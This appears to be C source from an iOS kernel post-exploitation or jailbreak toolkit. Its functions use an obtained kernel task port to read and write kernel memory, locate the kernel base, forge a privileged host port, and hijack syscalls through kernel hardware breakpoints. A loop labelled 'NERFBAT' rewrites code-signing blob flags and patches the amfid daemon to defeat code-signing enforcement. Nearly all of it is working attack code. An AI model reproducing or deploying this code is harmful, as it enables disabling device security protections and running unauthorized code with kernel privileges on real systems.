/*
 * Find the base address of the kernel image.
 *
 * Starts from the kobject pointer stored in our host port (named `realhost`
 * here), rounds it down to a 4k page boundary and scans backwards one page at
 * a time until a page begins with 0xfeedfacf (the 64-bit Mach-O header magic).
 *
 * Returns the address of the matching page, or 0 if nothing matched within
 * 0x10000 pages.
 */
uint64_t find_kernel_base() {
  uint64_t host_port_kaddr = find_port(mach_host_self());
  uint64_t realhost_kaddr =
      rk64(host_port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));

  // page-align, then walk down looking for the magic
  uint64_t candidate = realhost_kaddr & ~0xfffULL;
  int pages_left = 0x10000;

  while (pages_left > 0) {
    if (rk32(candidate) == 0xfeedfacf) {
      return candidate;
    }
    candidate -= 0x1000;
    pages_left--;
  }

  return 0;
}
/*
 * Breakpoint callback: emulates the instruction the breakpoint sits on and
 * swaps the buffer of the intercepted call for a fixed replacement string.
 *
 * state: saved register context of the code that hit the breakpoint; it is
 *        modified in place (pc, x8) and the caller writes it back.
 *
 * The replacement string lives in static storage. The previous version
 * strdup()'d a new copy on every hit, which leaked each copy and passed NULL
 * to strlen() if the allocation failed.
 */
void sys_write_breakpoint_handler(arm_context_t* state) {
  static const char replacer_string[] = "a different string!\n";

  // we will have to skip it one instruction ahead because single step won't work...
  state->ss.ss_64.pc += 4;

  // this means emulating what that instruction did:
  // LDR X8, [X8,#0x388]
  uint64_t val = rk64(state->ss.ss_64.x[8] + 0x388);
  state->ss.ss_64.x[8] = val;

  // x1 holds the argument block; the pointer at +8 and the length at +0x10
  // are overwritten.
  // NOTE(review): presumably this is write()'s uap (buffer, nbyte) - confirm.
  uint64_t uap = state->ss.ss_64.x[1];
  wk64(uap + 8, (uint64_t)(uintptr_t)replacer_string);
  wk64(uap + 0x10, sizeof(replacer_string) - 1); // length without the NUL
}
// build a fake host priv port mach_port_t fake_host_priv() { if (fake_host_priv_port != MACH_PORT_NULL) { return fake_host_priv_port; } // get the address of realhost: uint64_t hostport_addr = find_port(mach_host_self()); uint64_t realhost = rk64(hostport_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); // allocate a port mach_port_t port = MACH_PORT_NULL; kern_return_t err; err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port); if (err != KERN_SUCCESS) { printf("failed to allocate port\n"); return MACH_PORT_NULL; } // get a send right mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND); // locate the port uint64_t port_addr = find_port(port); // change the type of the port #define IKOT_HOST_PRIV 4 #define IO_ACTIVE 0x80000000 wk32(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IO_BITS), IO_ACTIVE|IKOT_HOST_PRIV); // change the space of the port wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER), ipc_space_kernel()); // set the kobject wk64(port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT), realhost); fake_host_priv_port = port; return port; }
int main(int argc, char** argv) { if (argc != 2) { printf("Usage\n\t%s kernel_base\n", argv[0]); return -1; } uint64_t kernel_base = strtoull(argv[1], NULL, 0x10); // THIS IS BOILERPLATE TO PROPERLY GAIN TFP0 AND INITIALIZE INTERNALS offsets_init(); task_t kernel_task; host_get_special_port(mach_host_self(), HOST_LOCAL_NODE, 4, &kernel_task); task_self_addr(); kernel_task_port = kernel_task; tfp0 = kernel_task; // THIS IS BOILERPLATE TO PROPERLY GAIN TFP0 AND INITIALIZE INTERNALS printf("Using kernel base 0x%llx\n", kernel_base); printf("Kernel base * == 0x%llx\n", rk64(kernel_base)); init_ws(kernel_task, kernel_base); wsmain(0); }
int main(int argc, char** argv) { // THIS IS BOILERPLATE TO PROPERLY GAIN TFP0 AND INITIALIZE INTERNALS offsets_init(); task_t kernel_task; host_get_special_port(mach_host_self(), HOST_LOCAL_NODE, 4, &kernel_task); task_self_addr(); kernel_task_port = kernel_task; tfp0 = kernel_task; // THIS IS BOILERPLATE TO PROPERLY GAIN TFP0 AND INITIALIZE INTERNALS if (argc != 1) { printf("Usage\n\t%s NO ARGUMENTS\n", argv[0]); return -1; } fprintf(stderr, "[NERFBAT]\tVersion 0.3b (tfp = 0x%x)\n", tfp0); fprintf(stderr, "[NERFBAT]\tpid = %d\n", getpid()); fprintf(stderr, "[NERFBAT]\tWaiting on handle for MISVSACI to open up...\n"); sleep(5); set_platform_attribs(get_proc_block(getpid()), tfp0); uint32_t amfid_pid = 0; kern_return_t kr; mach_port_name_t amfid_port = 0; int failure = 1; uint64_t old_amfid_MISVSACI_local = 0; if(!(access("/tmp/amfid.MISVSACI", F_OK) == -1)) { char fdata[0x20]; sprintf(fdata, "0x%llx", old_amfid_MISVSACI); int fd = open("/tmp/amfid.MISVSACI", O_RDONLY); read(fd, fdata, 0x20); close(fd); old_amfid_MISVSACI_local = strtoull(fdata, 0, 0x10); old_amfid_MISVSACI = old_amfid_MISVSACI_local; fprintf(stderr, "[NERFBAT]\tLoading old jump table: 0x%llx\n", old_amfid_MISVSACI); fprintf(stderr, "[NERFBAT]\tabout to search for the binary load address\n"); amfid_pid = get_pid_from_name("amfid"); fprintf(stderr, "[NERFBAT]\tAMFID pid = %d\n", amfid_pid); fprintf(stderr, "[NERFBAT]\t[i]\ttask for pid 0 = 0x%x\n", tfp0); kr = task_for_pid(mach_task_self(), amfid_pid, &amfid_port); if (kr != KERN_SUCCESS) fprintf(stderr, "[NERFBAT]\t[-]\tTHERE WAS AN ERROR GETTING task_for_portfor AMFID\n"); amfid_base = binary_load_address(amfid_port); fprintf(stderr, "[NERFBAT]\tamfid load address: 0x%llx\n", amfid_base); } else { fprintf(stderr, "[NERFBAT]\t[i]\tMASSIVE PROBLEM IN NERFBAT\n"); } while (1) { if (failure || get_pid_from_name("amfid") != amfid_pid) { amfid_pid = get_pid_from_name("amfid"); fprintf(stderr, "[NERFBAT]\t[i]\tAMFID pid == %d\n", amfid_pid); uint64_t 
amfid_proc = get_proc_block(amfid_pid); amfid_base = amfid_proc; fprintf(stderr, "[NERFBAT]\t[i]\tAMFID proc bloc == 0x%llx\n", amfid_proc); //We need to enable amfid to allow us to get a port to it fprintf(stderr, "[NERFBAT]\t[i]\tAMFID pid == %d\n", amfid_pid); uint64_t amfid_task = get_proc_block(amfid_pid); fprintf(stderr, "[NERFBAT]\t[i]\tGot amfid pid at 0x%llx\n", amfid_task); uint64_t vnode_info = rk64(amfid_task+0x248); fprintf(stderr, "[NERFBAT]\t[i]\tVNODE INFO : 0x%llx\n", vnode_info); uint64_t ubc_info = rk64(vnode_info+0xf*sizeof(uint64_t)); fprintf(stderr, "[NERFBAT]\t[i]\tMy UBC INFO is 0x%llx\n", ubc_info); uint64_t blob = rk64(ubc_info+0xa*sizeof(uint64_t)); char *csb = malloc(0xa8); mach_vm_address_t sz = 0; mach_vm_read_overwrite(tfp0, (mach_vm_address_t)blob, 0xa8, (mach_vm_address_t)csb, &sz); fprintf(stderr, "[NERFBAT]\t[i]\tCurrent 0xa4 = 0x%02x\n", (int)*(char *)((char *)csb + 0xA4)); *(char *)((char *)csb + 0xA4) = (*((char *)csb + 0xA4) & 0xFE) | 1; fprintf(stderr, "[NERFBAT]\t[i]\tNew 0xa4 = 0x%02x\n", (int)*(char *)((char *)csb + 0xA4)); fprintf(stderr, "[NERFBAT]\t[i]\tCurrent 0xc = 0x%04x\n", *(uint32_t *)((uint32_t *)csb + 0xc)); *(uint32_t *)((uint32_t *)csb + 0xc) = *((uint32_t *)csb + 0xc) | htonl(0x22000005); fprintf(stderr, "[NERFBAT]\t[i]\tCurrent 0xc = 0x%04x\n", *(uint32_t *)((uint32_t *)csb + 0xc)); mach_vm_write(tfp0, blob, (vm_offset_t)csb, 0xa8); free(csb); fprintf(stderr, "[NERFBAT]\t[i]\ttask for pid 0 = 0x%x\n", tfp0); kr = task_for_pid(mach_task_self(), amfid_pid, &amfid_port); if (kr != KERN_SUCCESS) { fprintf(stderr, "[NERFBAT]\t[-]\tTHERE WAS AN ERROR GETTING task_for_portfor AMFID\n"); failure = 1; } else { failure = 0; } fprintf(stderr, "[NERFBAT]\t[i]\tPATCHING AMFID on port = 0x%x\n", amfid_port); unpatch_amfid(amfid_port, old_amfid_MISVSACI_local); patch_amfid(amfid_port); } fprintf(stderr, "[NERFBAT]\t[i]\tSleeping for 10 seconds...\n"); sleep(10); } }
// this runs on the thread which will execute the target syscall to debug void run_syscall_with_breakpoint(uint64_t bp_address, breakpoint_callback callback, uint32_t syscall_number, uint32_t n_args, ...) { // pin this thread to the target cpu: pin_current_thread(); // set the Kernel Debug Enable bit of MDSCR_EL1: set_MDSCR_EL1_KDE(mach_thread_self()); // MDE will be set by the regular API for us // enable a hw debug breakpoint at bp_address // it won't fire because PSTATE.D will be set, but we'll deal with that in a bit! // set a hardware bp on the thread using the proper API so that all the structures are already set up: struct arm64_debug_state state = {0}; state.bvr[0] = bp_address; #define BCR_BAS_ALL (0xf << 5) #define BCR_E (1 << 0) state.bcr[0] = BCR_BAS_ALL | BCR_E; // enabled kern_return_t err = thread_set_state(mach_thread_self(), ARM_DEBUG_STATE64, (thread_state_t)&state, sizeof(state)/4); // verify that it got set: memset(&state, 0, sizeof(state)); mach_msg_type_number_t count = sizeof(state)/4; err = thread_get_state(mach_thread_self(), ARM_DEBUG_STATE64, (thread_state_t)&state, &count); if (state.bvr[0] != bp_address) { printf("setting the bp address failed\n"); } // now go and find that thread's DebugData where those values are stored. 
uint64_t thread_port_addr = find_port_address(mach_thread_self(), MACH_MSG_TYPE_COPY_SEND); uint64_t thread_t_addr = rk64(thread_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT)); printf("thread_t_addr: %llx\n", thread_t_addr); // read bvr[0] in that thread_t's DebugData: uint64_t DebugData = rk64(thread_t_addr + ACT_DEBUGDATA_OFFSET); //printf("DebugData: %llx\n", DebugData); uint64_t bvr0 = rk64(DebugData + offsetof(struct arm_debug_aggregate_state, ds64.bvr[0])); printf("bvr0 read from the DebugData: 0x%llx\n", bvr0); uint32_t bcr0 = rk32(DebugData + offsetof(struct arm_debug_aggregate_state, ds64.bcr[0])); printf("bcr0 read from the DebugData: 0x%08x\n", bcr0); // need to manually set this too in the bcr: #define ARM_DBG_CR_MODE_CONTROL_ANY (3 << 1) bcr0 |= ARM_DBG_CR_MODE_CONTROL_ANY; wk32(DebugData + offsetof(struct arm_debug_aggregate_state, ds64.bcr[0]), bcr0); printf("set ARM_DBG_CR_MODE_CONTROL_ANY\n"); // returning from the syscall should be enough to set it. struct monitor_args* margs = malloc(sizeof(struct monitor_args)); margs->target_thread_port = mach_thread_self(); margs->breakpoint = bp_address; margs->callback = callback; // spin up a thread to monitor when the bp is hit: pthread_t th; pthread_create(&th, NULL, monitor_thread, (void*)margs); printf("started monitor thread\n"); struct syscall_args sargs = {0}; sargs.number = syscall_number; va_list ap; va_start(ap, n_args); for (int i = 0; i < n_args; i++){ sargs.arg[i] = va_arg(ap, uint64_t); } va_end(ap); // now execute a syscall with PSTATE.D disabled: syscall_complete = 0; do_syscall_with_pstate_d_unmasked(&sargs); syscall_complete = 1; printf("syscall returned\n"); pthread_join(th, NULL); printf("monitor exited\n"); }
/*
 * Monitor loop: waits for the target thread to hit the hardware breakpoint,
 * lets `callback` edit the saved register state of the code that hit it, then
 * releases the thread.
 *
 * target_thread_port: thread port of the thread running the syscall
 * looper_pc:          pc value identifying the saved state of the spinning
 *                     "looper" on the target thread's kernel stack
 * breakpoint:         expected pc of the state that hit the breakpoint
 * callback:           invoked with a local copy of that state; the copy is
 *                     written back to the kernel afterwards
 *
 * Returns once syscall_complete is set, or when the looper's saved state
 * cannot be found on the stack.
 *
 * Changes from the previous version:
 *  - the stack scan no longer reads `pc` past the end of the local stack
 *    snapshot when a matching tag sits near its end
 *  - when no breakpoint-hitting state is found, the callback and the
 *    write-back are skipped instead of overwriting unrelated kernel memory
 */
void handle_kernel_bp_hits(mach_port_t target_thread_port, uint64_t looper_pc, uint64_t breakpoint, breakpoint_callback callback) {
  // first 8 bytes of a saved state: flavor in the low word, count in the high word
  const uint64_t saved_state64_tag =
      ARM_SAVED_STATE64 | (((uint64_t)ARM_SAVED_STATE64_COUNT) << 32);
  const size_t pc_offset = offsetof(arm_context_t, ss.ss_64.pc);

  // get the target thread's thread_t
  uint64_t thread_port_addr = find_port_address(target_thread_port, MACH_MSG_TYPE_COPY_SEND);
  uint64_t thread_t_addr = rk64(thread_port_addr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));

  while (1) {
    uint64_t looper_saved_state = 0;
    int found_it = 0;
    while (!found_it) {
      if (syscall_complete) {
        return;
      }
      // we've pinned ourself to the same core, so if we're running, it isn't...
      // in some ways this code is very racy, but when we actually have detected that the target
      // thread has hit the breakpoint it should be safe until we restart it
      // and up until then we don't do anything too dangerous...

      // get the kstack pointer
      uint64_t kstackptr = rk64(thread_t_addr + koffset(KSTRUCT_OFFSET_THREAD_KSTACKPTR));

      printf("kstackptr: %llx\n", kstackptr);

      // get the thread_kernel_state
      // the stack lives below kstackptr, and kstackptr itself points to a struct thread_kernel_state:
      // the first bit of that is just an arm_context_t:
      // this is the scheduled-off state
      arm_context_t saved_ksched_state = {0};
      kmemcpy((uint64_t)&saved_ksched_state, kstackptr, sizeof(arm_context_t));

      // get the saved stack pointer
      uint64_t sp = saved_ksched_state.ss.ss_64.sp;
      printf("sp: %llx\n", sp);

      if (sp == 0) {
        continue;
      }

      uint64_t stack[128] = {0};

      // walk up from there and look for the saved state dumped by the fiq:
      // note that it won't be right at the bottom of the stack
      // instead there are the frames for:
      //   ast_taken_kernel       <-- above this is the saved state which will get restored when the hw bp spinner gets rescheduled
      //   thread_block_reason
      //   thread_invoke
      //   machine_switch_context
      //   Switch_context         <-- the frame actually at the bottom of the stack

      // should probably walk those stack frame properly, but this will do...

      // grab the stack
      kmemcpy((uint64_t)&stack[0], sp, sizeof(stack));

      for (int i = 0; i < 128; i++) {
        size_t byte_off = (size_t)i * sizeof(uint64_t);

        // the pc field of a state starting at stack[i] must still lie inside
        // the snapshot; beyond this point no candidate can be checked
        if (byte_off + pc_offset + sizeof(uint64_t) > sizeof(stack)) {
          break;
        }

        if (stack[i] != saved_state64_tag) {
          continue;
        }

        uint64_t candidate_pc = 0;
        memcpy(&candidate_pc, (const char*)stack + byte_off + pc_offset, sizeof(candidate_pc));
        if (candidate_pc != looper_pc) {
          continue;
        }

        found_it = 1;
        looper_saved_state = sp + byte_off;
        printf("found the saved state probably at %llx\n", looper_saved_state); // should walk the stack properly..
        break;
      }

      if (!found_it) {
        // NOTE(review): the message promises a retry but the code returns;
        // behaviour kept as in the original - confirm which one is intended.
        printf("unable to find the saved scheduler tick state on the stack, waiting a bit then trying again...\n");
        sleep(1);
        return;
      }
    }

    // now keep walking up and find the saved state for the code which hit the BP:
    uint64_t bp_hitting_state = looper_saved_state + sizeof(arm_context_t);
    arm_context_t bp_context;
    found_it = 0;
    for (int i = 0; i < 1000; i++) {
      uint64_t flavor_and_count = rk64(bp_hitting_state);
      if (flavor_and_count != saved_state64_tag) {
        bp_hitting_state += 8;
        continue;
      }

      kmemcpy((uint64_t)&bp_context, bp_hitting_state, sizeof(arm_context_t));

      // debug dump of the first 40 words of the candidate state
      for (int word = 0; word < 40; word++) {
        uint64_t* buf = (uint64_t*)&bp_context;
        printf("%016llx\n", buf[word]);
      }

      if (bp_context.ss.ss_64.pc != breakpoint) {
        printf("hummm, found an unexpected breakpoint: %llx\n", bp_context.ss.ss_64.pc);
      }

      found_it = 1;
      break;
    }

    if (!found_it) {
      // bp_hitting_state now points 1000 words past where we started and at
      // nothing we recognise: leave that memory alone
      printf("unable to find bp hitting state\n");
    } else {
      // fix up the bp hitting state so it will continue (with whatever modifications we want:)
      callback(&bp_context);

      // write that new state back:
      kmemcpy(bp_hitting_state, (uint64_t)&bp_context, sizeof(arm_context_t));
    }

    // unblock the looper:
    wk64(looper_saved_state + offsetof(arm_context_t, ss.ss_64.pc), ksym(KSYMBOL_SLEH_SYNC_EPILOG));

    // when it runs again it should break out of the loop and continue the syscall

    // forces us off the core and hopefully it on:
    thread_switch(target_thread_port, 0, 0);
    swtch_pri(0);
  }
}
// pin the current thread to a processor, returns a pointer to the processor we're pinned to uint64_t pin_current_thread() { // get the current thread_t: uint64_t th = current_thread(); #if 0 // get the processor_t this thread last ran on uint64_t processor = rk64(th + koffset(KSTRUCT_OFFSET_THREAD_LAST_PROCESSOR)); printf("thread %llx last ran on %llx, pinning it to that core\n", th, processor); // this is probably fine... wk64(th + koffset(KSTRUCT_OFFSET_THREAD_BOUND_PROCESSOR), processor); #endif // need the struct cpu_data for that processor which is stored in the CpuDataEntries array, declared in data.s // it's 6*4k in to the data segment uint64_t cpu_data_entries = ksym(KSYMBOL_CPU_DATA_ENTRIES); int cpu_id = 0; // it's an array of cpu_data_entry_t which contains just the 64-bit physical and virtual addresses of struct cpu_data uint64_t cpu_data = rk64(cpu_data_entries + ((cpu_id * 0x10) + 8)); uint64_t processor = rk64(cpu_data + koffset(KSTRUCT_OFFSET_CPU_DATA_CPU_PROCESSOR)); printf("trying to pin to cpu0: %llx\n", processor); // pin to that cpu // this is probably fine... 
wk64(th + koffset(KSTRUCT_OFFSET_THREAD_BOUND_PROCESSOR), processor); // that binding will only take account once we get scheduled off and back on again so yield the cpu: printf("pin_current_thread yielding cpu\n"); swtch_pri(0); printf("pin_current_thread back on cpu\n"); uint64_t chosen = rk64(th + koffset(KSTRUCT_OFFSET_THREAD_CHOSEN_PROCESSOR)); printf("running on %llx\n", chosen); #if 0 // should now be running on the chosen processor, and should only get scheduled on there: printf("we're running again!\n"); int got_switched = 0; for (int i = 0; i < 1000; i++) { swtch_pri(0); uint64_t p = rk64(th + koffset(KSTRUCT_OFFSET_THREAD_CHOSEN_PROCESSOR)); if (p != processor) { printf("got moved off target processor\n"); got_switched = 1; break; } usleep(15000); p = rk64(th + koffset(KSTRUCT_OFFSET_THREAD_CHOSEN_PROCESSOR)); if (p != processor) { printf("got moved off target processor\n"); got_switched = 1; break; } } if (!got_switched) { printf("looks like pinning works!\n"); } #endif return processor; }
/*
 * Return the kobject pointer stored in the kernel port for
 * mach_thread_self(), which callers in this file use as the address of the
 * current thread's thread_t.
 */
uint64_t current_thread() {
  uint64_t port_kaddr = find_port(mach_thread_self());
  uint64_t kobject_field = port_kaddr + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT);
  return rk64(kobject_field);
}
/*
 * Return the value of the ip_receiver field read at task_self_addr().
 * NOTE(review): presumably task_self_addr() is the kernel address of our task
 * port, whose receiver is the kernel's ipc space - confirm against its
 * definition.
 */
uint64_t ipc_space_kernel() {
  uint64_t receiver_field = task_self_addr() + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_RECEIVER);
  return rk64(receiver_field);
}